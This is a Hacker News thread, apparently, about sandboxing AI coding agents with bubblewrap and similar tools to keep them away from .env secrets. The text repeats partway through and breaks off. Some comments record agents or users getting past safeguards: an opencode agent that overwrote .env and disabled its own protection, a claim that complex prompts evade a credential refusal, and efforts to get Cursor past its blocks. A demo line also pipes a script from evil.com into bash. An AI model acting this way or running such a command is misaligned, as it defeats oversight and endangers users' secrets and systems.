Bubblewrap: A nimble way to prevent agents from accessing your .env files (opens in new tab)

(patrickmccanna.net)

187 points0o_MrPatrick_o05mo ago140 comments

140 comments

100 comments · 35 top-level

bjackman5mo ago· 16 in thread

I really don't understand why people have all these "lightweight" ways of sandboxing agents. In my view there are two models:

- totally unsandboxed but I supervise it in a tight loop (the window just stays open on a second monitor and it interrupts me every time it needs to call a tool).

- unsupervised in a VM in the cloud where the agent has root. (I give it a task, negotiate a plan, then close the tab and forget about it until I get a PR or a notification that it failed).

I want either full capabilities for the agent (at the cost of needing to supervise for safety) or full independence (at the cost of limited context in a VM). I don't see a productive way to mix and match here, seems you always get the worst of both worlds if you do that.

Maybe the usecase for this particular example is where you are supervising the agent but you're worried that apparently-safe tool calls are actually quietly leaving a secret that's in context? So it's not that it's a 'mixed' usecase but rather it's just increasing safety in the supervised case?

emilburzo5mo ago

> unsupervised in a VM in the cloud where the agent has root

Why in the cloud and not in a local VM?

I've re-discovered Vagrant and have been using it exactly for this and it's surprisingly effective for my workflows.

https://blog.emilburzo.com/2026/01/running-claude-code-dange...

avtar5mo ago

It's been ages since I used VirtualBox and reading the following didn't make me miss the experience at all:

> Eventually I found this GitHub issue. VirtualBox 7.2.4 shipped with a regression that causes high CPU usage on idle guests.

The list of viable hypervisors for running VMs with 3D acceleration is probably short but I'd hope there are more options these days for running headless VMs. Incus (on Linux hosts) and Lima come to mind and both are alternatives to Vagrant as well.

1 more reply

benterix5mo ago

Depends on what you do. If you need to have a fully working site with external integrations, SSL and so on, it's just easier to spend $4 a month on a VPS. But you're right, for many backend-based projects a local VM like multipass or a kind/microk8s cluster are perfectly fine.

ahmadyan5mo ago

You mentioned "deleting the actual project, since the file sync is two-way", my solution (in agentastic.dev) was to fist copy the code with git-worktree, then share that with the container.

bjackman5mo ago

Yeah local is totally fine too just whatever is easiest to set up.

Bender5mo ago

As someone that does this, it's Turtles All The Way Down [1]. Every layer has escapes. I require people to climb up multiple turtles thus breaking most skiddie [2] scripts. Attacks will have to targeted and custom crafted by people that can actually code thus reducing the amount of turds in the swimming pool I must avoid. People should not write apps that make assumptions around accessing sensitive files.

[1] - https://en.wikipedia.org/wiki/Turtles_all_the_way_down

[2] - https://en.wikipedia.org/wiki/Skiddies

bjackman5mo ago

It's turtles all the way down but there is a VERY big gap between VM Isolation Turtle and <a half-arse seccomp policy> turtle. It's a qualitative difference between those two sandboxes.

(If the VM is remote, even more so).

theptip5mo ago

It’s a risk/convenience tradeoff. The biggest threat is Claude accidentally accesses and leaks your ssl keys, or gets prompt-hijacked to do the same. A simple sandbox fixes this.

There are theoretical risks of Claude getting fully owned and going rogue, and doing the iterative malicious work to escape a weaker sandbox, but it seems substantially less likely to me, and therefore perhaps not (currently) worth the extra work.

bjackman5mo ago

How does a simple sandbox fix this at all? If Claude has been prompt-hijacked you need a VM to be anywhere near safe.

1 more reply

sschueller5mo ago

Is there a premade VM image or docker container I can just start with for example Google Antigravity, Claude or Kilocode/vscode? Right now I have to install some linux desktop and all the tools needed, a bit of a pain IMO.

I see there are cloud VMs like at kilocode but they are kind if useless IMO. I can only interact with the prompt and not the code base directly. Too many things go wrong and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud.

bjackman5mo ago

I use https://jules.google.

The UI is obviously vibe-coded garbage but the underlying system works. And most of the time you don't have to open the UI after you've set it running you just comment on the Github PR.

This is clearly an unloved "lab" project that Google will most likely kill but to me the underlying product model is obviously the right one.

I assume Microsoft got this model right first with the "assign issue to Copilot" thing and then fumbled it by being Microsoft. So whoever eventually turns this <correct product model> into an <actual product that doesn't suck> should win big IMO.

roywiggins5mo ago

Locally, I'd use Vagrant with a provisioning script that installs whatever you need on top of one of the prebuilt Vagrant boxes. You can then snapshot that if you want and turn that into a base image for subsequent containers.

emilburzo5mo ago

> [...] and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud

Yes! I'm surprised more people do not want this capability. Check out my comment above, I think Vagrant might also be what you want.

wasting_time5mo ago

fly.io launched something like that recently:

https://sprites.dev/

arcanemachiner5mo ago

Just got started with Claude Code the other day, using the dev container CLI. It's super easy.

TLDR:

- Ensure that you have installed npm on your machine.

- Install the dev container CLI globally via npm: `npm i -g @devcontainers/cli`

- Clone the Claude Code repo: https://github.com/anthropics/claude-code

- Navigate into the root directory of that repo.

- Run the dev container CLI command to start the container: `devcontainer --workspace-folder . up`

- Run another dev container command to start Claude in the container: `devcontainer exec --workspace-folder . claude`

And there you go! You have a sandboxed environment for Claude to work in. (As sandboxed as Docker is, at least.)

I like this method because you can just manage it like any other Docker container/volumes. When you want to rebuild it, or reset the volume, you just use the appropriate Docker (and the occasional dev container) commands.

1 more reply

dizhn5mo ago

I was using opencode the other day. It took me a while to realize the that the agent couldn't read/write the .env file but didn't realize it. When I pushed it first it was able to create a temp file and copy it over .env AND write and opencode.json file that disables the .env protection and go wild.

aszen5mo ago· 8 in thread

I wonder why we are even storing secrets in .env files in plain text

makoto125mo ago

This wouldn't have made the front page if it was: "How to not store your secrets in plain text"

patapong5mo ago

I would also prefer not doing this. Does anyone know of any lightweight, cross platform alternatives?

geoffeg5mo ago

I use sops and age, originally loosely based on this article: https://devops.datenkollektiv.de/using-sops-with-age-and-git...

I originally set up the git filters, but later disabled them.

phrotoma5mo ago

Perhaps I'm off base here but it seems like the goal is:

1. allow an agent to run wild in some kind of isolated environment, giving the "tight loop" coding agent experience so you don't have to approve everything it does.

2. let it execute the code it's creating using some credentials to access an API or a server or whatever, without allowing it to exfil those creds.

If 1 is working correctly I don't see how 2 could be possible. Maybe there's some fancy homomorphic encryption / TEE magic to achieve this but like ... if the process under development has access to the creds, and the agent has unfettered access to the development environment, it is not obvious to me how both of these goals could be met simultaneously.

Very interested in being wrong about this. Please correct me!

2 more replies

eddd-ddde5mo ago

https://www.passwordstore.org/

You can easily script it to decode passwords on demand.

WhyNotHugo5mo ago

If your .env file is being sourced by something like direnv, you can have it read secrets from the secret storage service and export them as env vars.

If you bind-mount the directory, the sandbox can see the commands, but executing them won’t work since it can’t access the secret service.

aszen5mo ago

https://devenv.sh/integrations/secretspec/

johnisgood5mo ago

I would like an answer, too.

theden5mo ago· 8 in thread

Kinda funny that a lot of devs accepted that LLMs are basically doing RCE on their machines, but instead of halting from using `--dangerously-skip-permissions` or similar bad ideas, we're finding workarounds to convince ourselves it's not that bad

simonw5mo ago

Because we've judged it to be worth it!

YOLO mode is so much more useful that it feels like using a different product.

If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.

zahlman5mo ago

Why not just demand agents that don't expose the dangerous tools in the first place? Like, have them directly provide functionality (and clearly consider what's secure, sanitize any paths in the tool use request, etc.) instead of punting to Bash?

5 more replies

pjm3315mo ago

I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.

1 more reply

catlifeonmars5mo ago

Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?

croes5mo ago

> Because we've judged it to be worth it!

Famous last words

catlifeonmars5mo ago

People really really want to juggle chainsaws, so have to keep coming up with thicker and thicker gloves.

solumunus5mo ago

The alternative is dropping them and then doing less work, earning less money and having less fun. So yes, we will find a way.

1 more reply

staticassertion5mo ago

Just like every package manager already does? This issue predates LLMs and people have never cared enough to pressure dev tooling into caring. LLMs have seemingly created a world where people are finally trying to solve the long existing "oh shit there's code execution everywhere in my dev environment where I have insane levels of access to prod etc" problem.

raphinou5mo ago· 5 in thread

I put all my agents in a docker file in which the code I'm working on is mounted. It's working perfectly for me until now. I even set it up so I can run gui apps like antigravity in it (X11). If anyone is interested I shared my setup at https://github.com/asfaload/agents_container

grewil25mo ago

It won’t save you from prompt injektions that attack your network.

TCattd5mo ago

Shameless plug, in case you're interested: https://github.com/EstebanForge/construct-cli

Let me know if you give it a go ;)

1 more reply

fgonzag5mo ago

In theory the docker container should only have the projects directory mounted, open access to the internet, and thats it. No access to anything else on the host or the local network.

Internet to connect with the provider, install packages, and search.

It's not perfect but it's a start.

63stack5mo ago

Docker containers run in their separate isolated network

2 more replies

raphinou5mo ago

of course, I'm not pretending this is a universal remedy solving all the problems. But I will add a note in the readme to make it clear, thanks for the feedback!

simonw5mo ago· 3 in thread

I recommend caution with this bit:

  --bind "$HOME/.claude" "$HOME/.claude"

That directory has a bunch of of sensitive stuff in it, most notable the transcripts of all of your previous Claude Code sessions.

You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.

0o_MrPatrick_o0OP5mo ago

Heya- The reason I add this directory is because Claude needs read/write permissions for getting new auth tokens.

Without this, you'll have to re-login to Claude every time. Breaks the speed of development.

I'm going to do some experimenting to see if I can make this bind more precise.

pmontra5mo ago

I think that the rw directories should not be shared among projects. Maybe there should be separate copies even for what gets mounted into $HOME/.nvm

0o_MrPatrick_o0OP5mo ago

Wonderful insight! Thank you!

meander_water5mo ago· 3 in thread

I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:

> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.

So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.

0o_MrPatrick_o0OP5mo ago

If your prompt is complex enough, doesn’t seem to get triggered.

I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.

Kinda bums me out that there may be circumstances where the model just rejects this even if you for some reason you needed it.

mmis10005mo ago

It seems depends on model and context usage though, the agent forgets a lot of things after half fill up. It even forgets the primary target you give at the start of chat.

bavell5mo ago

Claude definitely has some API token security baked in, it saw some API keys in a log file of mine the other day and called them out to me as a security issue very clearly. In this case it was a false positive but it handled the situation well and even gave links to reset each token.

typs5mo ago· 3 in thread

I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!

verdverm5mo ago

Like this? (Obfuscated, from agent and history)

https://bsky.app/profile/verdverm.com/post/3mbo7ko5ek22n

GrowingSideways5mo ago

If you wouldn't upload keys to github, why would you trust them to cursor?

hahahahhaah5mo ago

A local .env should be safe to put on your T shirt and walk down times square.

Mysql user: test

Password: mypass123

Host: localhost

...

2 more replies

zaptheimpaler5mo ago· 3 in thread

I haven’t used agents as much as I should, so forgive the ignorance. But a docker compose file seems much more general purpose and flexible to me. It’s a mature and well-tested technology that seems to fit this use case pretty well. It also lets you run all kinds of other services easily. Are there any good articles on the state of sandboxing for agents and why docker isn’t sufficient? I guess the article mentioned docker having a lot of config files or being complex, is that the only reason?

kondu5mo ago

Docker containers aren't safe enough to run untrusted code, there are privilege escalation vulnerabilities reported fairly often.

curt155mo ago

The common wisdom used to be that containers are not a security boundary. Is that still the case?

AlexCoventry5mo ago

I don't think bubblewrap is any better in that regard.

2 more replies

aurareturn5mo ago· 3 in thread

How do you prevent an agent that simply console.logs(process.env.SUPER_SECRET) and then looking at the log?

0o_MrPatrick_o0OP5mo ago

Great question! You might enjoy this writeup, which in one section explores avoiding the use of shell variables that are not exported as a method of mitigating this risk.

https://linus.schreibt.jetzt/posts/shell-secrets.html

progx5mo ago

Your app run in the app context, that is not accessible for an AI.

aurareturn5mo ago

You don't let your agent look at logs? How can it debug?

prmoustache5mo ago· 2 in thread

Isn't landrun the preferred way to sandbox apps on linux these days instead?

https://github.com/Zouuup/landrun

qrobit5mo ago

Bubblewrap seems to be much more popular[^1], personally this is the first time I heard about landrun

[1]: https://repology.org/project/bubblewrap/information https://repology.org/project/landrun/information

dividuum5mo ago

bubblewrap is a lot more flexible: You can freely piece together the sandboxed filesystem environment from existing directories, tmpfs, files or data provided via a file descriptor. landrun, from what I understand only restricts what already exists. What is neat with landrun is the TCP port restrictions. This isn't possible with bubblewrap at the moment, although nothing really prevents bubblewrap from adding landlock support for those cases.

hahahahhaah5mo ago· 2 in thread

Had this same idea in my head. Glad someone done it. For me the motivation is not LLMs but to have something as convenient as docker without waiting for image builds. A fast docker for running a bunch of services locally where perfect isolation and imaging doesnt matter.

JCattheATM5mo ago

So, Flatpak?

Funny enough Bubblewrap is also what Flatpak uses.

Imustaskforhelp5mo ago

I want to like flatpak but I am genuinely unable to understand the state of cli tools in flatpak or even how to develop it. It all seems very weird to build upon as compared to docker

rcarmo5mo ago· 2 in thread

I dunno. The compose file I use to run my agents right now is _half_ the size of that configuration, and I don’t buy that Docker is “more complex”

grewil25mo ago

Docker won’t save you from prompt injektions that attack your network.

rcarmo5mo ago

No kidding? https://taoofmac.com/space/blog/2026/01/12/1830

Still, I don’t think bubblewrap is either a simple or safe enough solution.

dangoodmanUT5mo ago· 1 in thread

I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a mac alternative). This is the only way i run agents on systems i care about

catlifeonmars5mo ago

> run agents on systems i care about

You must not care about those systems that much.

globular-toast5mo ago· 1 in thread

Posted this 6 months ago but got no traction here: https://blog.gpkb.org/posts/ai-agent-sandbox/

Recently got it working for OpenCode and updated my post.

Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering only mounting src/ and project metadata (including git) being read only.

You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.

0o_MrPatrick_o0OP5mo ago

Hey man- sorry for the lack of recognition. Timing is a bit of luck. Good writeup!

w/r/t .git being mounted read write- yeah, there's risk here. It's a tradeoff. I want my agents to be able to commit code- which means they need to be able to write to the dir.

Thanks for the --new-session parameter suggestion. Great add!

nextaccountic5mo ago· 1 in thread

How does this compare with container-use?

https://container-use.com/introduction

domh5mo ago

This is exactly what I want, but don't really want to run Docker all the time. Nicer git worktrees and isolation of code so I can run multiple agents. It even has the setup command stuff so "npm install" runs automatically.

I'll check this out for sure! I just wish it used bubblewrap or the macos equivalent instead of reaching for containers.

I have also been enjoying having an IDE open so I can interact with the agents as they're working, and not just "fire and forget" and check back in a while. I've only been experimenting with this for a couple of days though, so maybe I'm just not trusting enough of it yet.

LazarSRB5mo ago· 1 in thread

dontenvx solves this by encrypting your .env file so you can even commit it safely

0o_MrPatrick_o0OP5mo ago

Amazing tip! Thank you!

gexla5mo ago· 1 in thread

I believe this is also what Claude Code uses for the sandbox option.

0o_MrPatrick_o0OP5mo ago

Hi!

Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.

They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.

Thats helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.

Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.

I hope the desirability of this having consistent access controls across all agents is shared by others. You don’t get that property if you use Claude’s embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to implementation of controls.

gausswho5mo ago· 1 in thread

I'm having trouble finding the right incantations to bubblewrap opencode when in a silverblue toolbox. It can't use tools. Anyone have tips?

l725mo ago

This is what I have been using with opencode:

  exec bwrap \
    --unshare-pid \
    --unshare-ipc \
    --unshare-uts \
    --share-net \
    --bind "$OPENCODE_ROOT" "$OPENCODE_ROOT" \
    --bind "$CURRENT_DIR" "$CURRENT_DIR" \
    --bind "$HOME/.config/opencode/" "$HOME/.config/opencode/" \
    --bind "$HOME/.emacs" "$HOME/.emacs" \
    --bind "$HOME/.emacs.d" "$HOME/.emacs.d" \
    --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
    --ro-bind /bin /bin \
    --ro-bind /etc /etc \
    --ro-bind /lib /lib \
    --ro-bind /lib64 /lib64 \
    --ro-bind /usr /usr \
    --bind /run/systemd /run/systemd \
    --tmpfs /tmp \
    --proc /proc \
    --dev /dev \
    --setenv EDITOR emacs \
    --setenv PATH "$OPENCODE_BINDIR:/usr/bin:/bin" \
    --setenv HOME "$HOME" \
    -- \
    "opencode" "$@"

arresin5mo ago· 1 in thread

Why not just use a hook on reads?

0o_MrPatrick_o0OP5mo ago

because you're trusting Claude's implementation of hooks, which may be disastrous if they have a defect.

flakes5mo ago

I find it better to bubblewrap against a full sandbox directory. Using docker, you can export an image to a single tarball archive, flattening all layers. I use a compatible base image for my kernel/distro, and unpack the image archive into a directory.

With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.

bwrap --ro-bind image/ / --bind src/ /src ...

Any tools you need in the container are installed in the image you unpack.

Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL

brendoncarroll5mo ago

I also wrote a tool for doing this[0], after one of these agents edited a config file outside of the repo it was supposed to work within. I only realized the edit because I have my dotfiles symlinked to a git repository, and git status showed it when I was committing another change. It's likely that the agents are making changes that I (and others) are not aware of because there is no easy way to detect them.

The approach I started taking is mounting the directory, that I want the agent to work on, into a container. I use `/_` as the working directory, and have built up some practices around that convention; that's the only directory that I want it to make changes to. I also mount any config it might need as read-only.

The standard tools like claude code, goose, charm, whatever else, should really spawn the agent (or MCP server?) in another process in a container, and pipe context in and out over stdin/stdout. I want a tool for managing agents, and I want each agent to be its own process, in its own container. But just locking up the whole mess seems to work for now.

I see some people in the other comments iterating on what the precise arguments to bubblewrap should be. nnc lets you write presets in Jsonnet, and then refer them by name on the command line, so you can version and share the set of resources that you give to an agent or subprocess.

[0] https://github.com/brendoncarroll/nnc

Gerharddc5mo ago

Great writeup! An alternative I have explored (more for defense against supply-chain attacks than for agents admittedly) is to use rootless Podman to get a dev-container-like experience alongside sandboxing. To this end I have built https://github.com/Gerharddc/litterbox (https://litterbox.work/) which greatly simplifies container setup and integrates a special ssh-agent for sandboxing that always prompts the user before signing requests (as to keep your SSH keys safe).

Unfortunately Litterbox won't currently help much for specifically protecting .env files in a project folder though. I'd need to think if the design can be extended for this use-case now that I'm aware of the issue.

OutOfHere5mo ago

The link you need is https://github.com/containers/bubblewrap

Don't leave prod secrets in your dev env.

coppsilgold5mo ago

Note that bubblewrap can't protect you from misconfiguration, a kernel exploit or if you expose sensitive protocols to the workload inside (eg. x11 or even Wayland without a security context). Generally, it will do a passable job in protecting you from an automated no-0day attack script.

raw_anon_11115mo ago

My workflow even before Claude code.

1. I never use permanent credentials for AWS on my local computer.

2. I never have keys anywhere on my local computer. I put them in AWS Secret Manager.

3. My usual set of local access keys can’t create IAM roles (PowerUserAccess).

It’s not foolproof. But it does reduce the attack surface.

eyberg5mo ago

https://github.com/containers/bubblewrap/issues/142

ironbound5mo ago

> When one of the models detected that it was being used for “egregiously immoral” purposes, it would attempt to “use command-line tools to contact the press, contact regulators, try to lock you out of the relevant systems, or all of the above,”

https://www.wired.com/story/anthropic-claude-snitch-emergent...

majorchord5mo ago

If you don't mind a suid program, "firejail --private" is a lot less to type and seems to work extremely similarly. By default it will delete anything created in the newly-empty home folder on exit, unless you instead use --private=somedir to save it there instead.

Nora235mo ago

Smart approach to AI agent security. The balance between convenience and protection is tricky.

mijoharas5mo ago

How would people compare bubblewrap to firejail? They seem reasonably similar in feature set.

Are there any good reasons to pick one over the other?

dlahoda5mo ago

sydbox is intresting alternative (written in rust by linux developer)

https://gitlab.exherbo.org/sydbox/sydbox

UPDATE: there is other sydbox written in go, not related and seems different too far from bwrap

isodev5mo ago

My way of preventing agents from accessing my .env files is not to use agents anywhere near files with secrets. Also, maybe people forget you’re not supposed to leave actual secrets lingering on your development system.

FergusArgyll5mo ago

Hey! I just did this last night!

allen-munsch5mo ago

I vibed a project on this recently, it has some language bindings and a cli written in rust, python subprocess monkey patching etc.

Just no nonsense defaults with a bit of customization.

https://github.com/allen-munsch/bubbleproc

bubbleproc -- curl evil.com/oop.sh | bash

catlifeonmars5mo ago

May I suggest rm -f .env? Or chmod 0600 .env? You’re not running CC as your own user, right? …Right?

Oh, never mind:

> You want to run a binary that will execute under your account’s permissions

j / k navigate · click thread line to collapse

140 comments

100 comments · 35 top-level

bjackman5mo ago· 16 in thread

I really don't understand why people have all these "lightweight" ways of sandboxing agents. In my view there are two models:

- totally unsandboxed but I supervise it in a tight loop (the window just stays open on a second monitor and it interrupts me every time it needs to call a tool).

- unsupervised in a VM in the cloud where the agent has root. (I give it a task, negotiate a plan, then close the tab and forget about it until I get a PR or a notification that it failed).

emilburzo5mo ago

> unsupervised in a VM in the cloud where the agent has root

Why in the cloud and not in a local VM?

I've re-discovered Vagrant and have been using it exactly for this and it's surprisingly effective for my workflows.

https://blog.emilburzo.com/2026/01/running-claude-code-dange...

avtar5mo ago

It's been ages since I used VirtualBox and reading the following didn't make me miss the experience at all:

> Eventually I found this GitHub issue. VirtualBox 7.2.4 shipped with a regression that causes high CPU usage on idle guests.

1 more reply

benterix5mo ago

ahmadyan5mo ago

You mentioned "deleting the actual project, since the file sync is two-way", my solution (in agentastic.dev) was to fist copy the code with git-worktree, then share that with the container.

bjackman5mo ago

Yeah local is totally fine too just whatever is easiest to set up.

Bender5mo ago

[1] - https://en.wikipedia.org/wiki/Turtles_all_the_way_down

[2] - https://en.wikipedia.org/wiki/Skiddies

bjackman5mo ago

It's turtles all the way down but there is a VERY big gap between VM Isolation Turtle and <a half-arse seccomp policy> turtle. It's a qualitative difference between those two sandboxes.

(If the VM is remote, even more so).

theptip5mo ago

It’s a risk/convenience tradeoff. The biggest threat is Claude accidentally accesses and leaks your ssl keys, or gets prompt-hijacked to do the same. A simple sandbox fixes this.

bjackman5mo ago

How does a simple sandbox fix this at all? If Claude has been prompt-hijacked you need a VM to be anywhere near safe.

1 more reply

sschueller5mo ago

bjackman5mo ago

I use https://jules.google.

The UI is obviously vibe-coded garbage but the underlying system works. And most of the time you don't have to open the UI after you've set it running you just comment on the Github PR.

This is clearly an unloved "lab" project that Google will most likely kill but to me the underlying product model is obviously the right one.

roywiggins5mo ago

emilburzo5mo ago

> [...] and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud

Yes! I'm surprised more people do not want this capability. Check out my comment above, I think Vagrant might also be what you want.

wasting_time5mo ago

fly.io launched something like that recently:

https://sprites.dev/

arcanemachiner5mo ago

Just got started with Claude Code the other day, using the dev container CLI. It's super easy.

TLDR:

- Ensure that you have installed npm on your machine.

- Install the dev container CLI globally via npm: `npm i -g @devcontainers/cli`

- Clone the Claude Code repo: https://github.com/anthropics/claude-code

- Navigate into the root directory of that repo.

- Run the dev container CLI command to start the container: `devcontainer --workspace-folder . up`

- Run another dev container command to start Claude in the container: `devcontainer exec --workspace-folder . claude`

And there you go! You have a sandboxed environment for Claude to work in. (As sandboxed as Docker is, at least.)

1 more reply

dizhn5mo ago

aszen5mo ago· 8 in thread

I wonder why we are even storing secrets in .env files in plain text

makoto125mo ago

This wouldn't have made the front page if it was: "How to not store your secrets in plain text"

patapong5mo ago

I would also prefer not doing this. Does anyone know of any lightweight, cross platform alternatives?

geoffeg5mo ago

I use sops and age, originally loosely based on this article: https://devops.datenkollektiv.de/using-sops-with-age-and-git...

I originally set up the git filters, but later disabled them.

phrotoma5mo ago

Perhaps I'm off base here but it seems like the goal is:

1. allow an agent to run wild in some kind of isolated environment, giving the "tight loop" coding agent experience so you don't have to approve everything it does.

2. let it execute the code it's creating using some credentials to access an API or a server or whatever, without allowing it to exfil those creds.

Very interested in being wrong about this. Please correct me!

2 more replies

eddd-ddde5mo ago

https://www.passwordstore.org/

You can easily script it to decode passwords on demand.

WhyNotHugo5mo ago

If your .env file is being sourced by something like direnv, you can have it read secrets from the secret storage service and export them as env vars.

If you bind-mount the directory, the sandbox can see the commands, but executing them won’t work since it can’t access the secret service.

aszen5mo ago

https://devenv.sh/integrations/secretspec/

johnisgood5mo ago

I would like an answer, too.

theden5mo ago· 8 in thread

simonw5mo ago

Because we've judged it to be worth it!

YOLO mode is so much more useful that it feels like using a different product.

If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.

zahlman5mo ago

5 more replies

pjm3315mo ago

I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.

1 more reply

catlifeonmars5mo ago

Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?

croes5mo ago

> Because we've judged it to be worth it!

Famous last words

catlifeonmars5mo ago

People really really want to juggle chainsaws, so have to keep coming up with thicker and thicker gloves.

solumunus5mo ago

The alternative is dropping them and then doing less work, earning less money and having less fun. So yes, we will find a way.

1 more reply

staticassertion5mo ago

raphinou5mo ago· 5 in thread

grewil25mo ago

It won’t save you from prompt injektions that attack your network.

TCattd5mo ago

Shameless plug, in case you're interested: https://github.com/EstebanForge/construct-cli

Let me know if you give it a go ;)

1 more reply

fgonzag5mo ago

In theory the docker container should only have the projects directory mounted, open access to the internet, and thats it. No access to anything else on the host or the local network.

Internet to connect with the provider, install packages, and search.

It's not perfect but it's a start.

63stack5mo ago

Docker containers run in their separate isolated network

2 more replies

raphinou5mo ago

of course, I'm not pretending this is a universal remedy solving all the problems. But I will add a note in the readme to make it clear, thanks for the feedback!

simonw5mo ago· 3 in thread

I recommend caution with this bit:

  --bind "$HOME/.claude" "$HOME/.claude"

That directory has a bunch of of sensitive stuff in it, most notable the transcripts of all of your previous Claude Code sessions.

You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.

0o_MrPatrick_o0OP5mo ago

Heya- The reason I add this directory is because Claude needs read/write permissions for getting new auth tokens.

Without this, you'll have to re-login to Claude every time. Breaks the speed of development.

I'm going to do some experimenting to see if I can make this bind more precise.

pmontra5mo ago

I think that the rw directories should not be shared among projects. Maybe there should be separate copies even for what gets mounted into $HOME/.nvm

0o_MrPatrick_o0OP5mo ago

Wonderful insight! Thank you!

meander_water5mo ago· 3 in thread

I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:

So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.

0o_MrPatrick_o0OP5mo ago

If your prompt is complex enough, doesn’t seem to get triggered.

I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.

Kinda bums me out that there may be circumstances where the model just rejects this even if you for some reason you needed it.

mmis10005mo ago

It seems depends on model and context usage though, the agent forgets a lot of things after half fill up. It even forgets the primary target you give at the start of chat.

bavell5mo ago

typs5mo ago· 3 in thread

I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!

verdverm5mo ago

Like this? (Obfuscated, from agent and history)

https://bsky.app/profile/verdverm.com/post/3mbo7ko5ek22n

GrowingSideways5mo ago

If you wouldn't upload keys to github, why would you trust them to cursor?

hahahahhaah5mo ago

A local .env should be safe to put on your T shirt and walk down times square.

Mysql user: test

Password: mypass123

Host: localhost

...

2 more replies

zaptheimpaler5mo ago· 3 in thread

kondu5mo ago

Docker containers aren't safe enough to run untrusted code, there are privilege escalation vulnerabilities reported fairly often.

curt155mo ago

The common wisdom used to be that containers are not a security boundary. Is that still the case?

AlexCoventry5mo ago

I don't think bubblewrap is any better in that regard.

2 more replies

aurareturn5mo ago· 3 in thread

How do you prevent an agent that simply console.logs(process.env.SUPER_SECRET) and then looking at the log?

0o_MrPatrick_o0OP5mo ago

Great question! You might enjoy this writeup, which in one section explores avoiding the use of shell variables that are not exported as a method of mitigating this risk.

https://linus.schreibt.jetzt/posts/shell-secrets.html

progx5mo ago

Your app run in the app context, that is not accessible for an AI.

aurareturn5mo ago

You don't let your agent look at logs? How can it debug?

prmoustache5mo ago· 2 in thread

Isn't landrun the preferred way to sandbox apps on linux these days instead?

https://github.com/Zouuup/landrun

qrobit5mo ago

Bubblewrap seems to be much more popular[^1], personally this is the first time I heard about landrun

[1]: https://repology.org/project/bubblewrap/information https://repology.org/project/landrun/information

dividuum5mo ago

hahahahhaah5mo ago· 2 in thread

JCattheATM5mo ago

So, Flatpak?

Funny enough Bubblewrap is also what Flatpak uses.

Imustaskforhelp5mo ago

I want to like flatpak but I am genuinely unable to understand the state of cli tools in flatpak or even how to develop it. It all seems very weird to build upon as compared to docker

rcarmo5mo ago· 2 in thread

I dunno. The compose file I use to run my agents right now is _half_ the size of that configuration, and I don’t buy that Docker is “more complex”

grewil25mo ago

Docker won’t save you from prompt injektions that attack your network.

rcarmo5mo ago

No kidding? https://taoofmac.com/space/blog/2026/01/12/1830

Still, I don’t think bubblewrap is either a simple or safe enough solution.

dangoodmanUT5mo ago· 1 in thread

I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a mac alternative). This is the only way i run agents on systems i care about

catlifeonmars5mo ago

> run agents on systems i care about

You must not care about those systems that much.

globular-toast5mo ago· 1 in thread

Posted this 6 months ago but got no traction here: https://blog.gpkb.org/posts/ai-agent-sandbox/

Recently got it working for OpenCode and updated my post.

You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.

0o_MrPatrick_o0OP5mo ago

Hey man- sorry for the lack of recognition. Timing is a bit of luck. Good writeup!

w/r/t .git being mounted read write- yeah, there's risk here. It's a tradeoff. I want my agents to be able to commit code- which means they need to be able to write to the dir.

Thanks for the --new-session parameter suggestion. Great add!

nextaccountic5mo ago· 1 in thread

How does this compare with container-use?

https://container-use.com/introduction

domh5mo ago

I'll check this out for sure! I just wish it used bubblewrap or the macos equivalent instead of reaching for containers.

LazarSRB5mo ago· 1 in thread

dontenvx solves this by encrypting your .env file so you can even commit it safely

0o_MrPatrick_o0OP5mo ago

Amazing tip! Thank you!

gexla5mo ago· 1 in thread

I believe this is also what Claude Code uses for the sandbox option.

0o_MrPatrick_o0OP5mo ago

Hi!

Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.

